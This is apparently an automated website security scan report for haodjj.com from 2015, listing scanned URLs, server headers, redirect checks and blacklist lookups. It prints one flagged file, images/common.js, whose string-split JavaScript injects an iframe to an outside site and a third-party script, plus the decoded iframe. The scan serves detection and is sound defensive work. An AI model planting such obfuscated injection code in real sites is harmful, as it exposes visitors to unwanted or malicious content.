Scanned pages/files
Request | Server response | Status |
http://haodjj.com/ | HTTP/1.1 200 OK Date: Thu, 20 Aug 2015 16:26:17 GMT Accept-Ranges: bytes ETag: "7c75564c8d58cf1:511" Server: Microsoft-IIS/6.0 Content-Length: 11759 Content-Location: http://haodjj.com/index.html Content-Type: text/html Last-Modified: Tue, 15 Apr 2014 09:30:11 GMT | clean |
http://haodjj.com/index.html | 200 OK Content-Length: 11759 Content-Type: text/html | clean |
http://haodjj.com/images/common.js | 200 OK Content-Length: 445 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. document.write ('<ifr'+'ame frameb'+'order="0" margi'+'nheight="0" margin'+'width="0" bor'+'der="0" scrol'+'ling="no" he'+'ight="4188px" wid'+'th="100%" src="ht'+'tp://w'+'w'+'w.966'+'966'+'2.c'+'o'+'m"></ifr'+'ame>'); document.write ('<scr'+'ipt langu'+'age="javas'+'cript" src="http://count'+'29.51'+'yes.com/cl'+'ick.aspx?id=295'+'614'+'740&lo'+'go=3" char'+'set="gb2312"></sc'+'ript>'); Decoded script: <iframe frameborder="0" marginheight="0" marginwidth="0" border="0" scrolling="no" height="4188px" width="100%" src="http://www.9669662.com"></iframe> | ||
http://haodjj.com/sitemap.html | HTTP/1.1 200 OK Date: Thu, 20 Aug 2015 16:26:20 GMT Accept-Ranges: bytes ETag: "92e986822f6ad01:511" Server: Microsoft-IIS/6.0 Content-Length: 2073 Content-Location: http://haodjj.com/404.html?404;http://haodjj.com:80/sitemap.html Content-Type: text/html Last-Modified: Sun, 29 Mar 2015 14:49:07 GMT | clean |
http://haodjj.com/404.html?404;http://haodjj.com:80/sitemap.html | 200 OK Content-Length: 2073 Content-Type: text/html | clean |
http://www.qq.com/404/search_children.js | 200 OK Content-Length: 295 Content-Type: application/javascript | clean |
http://haodjj.com/test404page.js | HTTP/1.1 200 OK Date: Thu, 20 Aug 2015 16:26:21 GMT Accept-Ranges: bytes ETag: "92e986822f6ad01:511" Server: Microsoft-IIS/6.0 Content-Length: 2073 Content-Location: http://haodjj.com/404.html?404;http://haodjj.com:80/test404page.js Content-Type: text/html Last-Modified: Sun, 29 Mar 2015 14:49:07 GMT | clean |
http://haodjj.com/404.html?404;http://haodjj.com:80/test404page.js | 200 OK Content-Length: 2073 Content-Type: text/html | clean |
http://haodjj.com/plug/rss/ | 200 OK Content-Length: 1467 Content-Type: text/xml | clean |
http://haodjj.com/l/NhL/ | 403 Forbidden Content-Length: 218 Content-Type: text/html | clean |
http://haodjj.com/l/XzU/ | 403 Forbidden Content-Length: 218 Content-Type: text/html | clean |
http://haodjj.com/l/HqD/ | 403 Forbidden Content-Length: 218 Content-Type: text/html | clean |
http://haodjj.com/l/l8h/ | 403 Forbidden Content-Length: 218 Content-Type: text/html | clean |
http://haodjj.com/l/VlS/ | 403 Forbidden Content-Length: 218 Content-Type: text/html | clean |
http://haodjj.com/l/NhL/18.html | 200 OK Content-Length: 7991 Content-Type: text/html | clean |
http://haodjj.com/tags/?/%B4%B4%B8%BB%D3%E9%C0%D6%B3%C7/ | 200 OK Content-Length: 4058 Content-Type: text/html | clean |
http://haodjj.com/tags/?/%B6%A5%CD%FA%D1%C7%D6%DE%D3%E9%C0%D6%B3%C7/ | 200 OK Content-Length: 3986 Content-Type: text/html | clean |
http://haodjj.com/l/l8h/4.html | 200 OK Content-Length: 5902 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: haodjj.com
Result:
HTTP/1.1 200 OK
Date: Thu, 20 Aug 2015 16:26:17 GMT
Accept-Ranges: bytes
ETag: "7c75564c8d58cf1:511"
Server: Microsoft-IIS/6.0
Content-Length: 11759
Content-Location: http://haodjj.com/index.html
Content-Type: text/html
Last-Modified: Tue, 15 Apr 2014 09:30:11 GMT
...11759 bytes of data.
GET / HTTP/1.1
Host: haodjj.com
Result:
HTTP/1.1 200 OK
Date: Thu, 20 Aug 2015 16:26:17 GMT
Accept-Ranges: bytes
ETag: "7c75564c8d58cf1:511"
Server: Microsoft-IIS/6.0
Content-Length: 11759
Content-Location: http://haodjj.com/index.html
Content-Type: text/html
Last-Modified: Tue, 15 Apr 2014 09:30:11 GMT
...11759 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: haodjj.com
Referer: http://www.google.com/search?q=haodjj.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: haodjj.com
Referer: http://www.google.com/search?q=haodjj.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=haodjj.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://haodjj.com/
Result: haodjj.com is not infected or malware details are not published yet.
Result: haodjj.com is not infected or malware details are not published yet.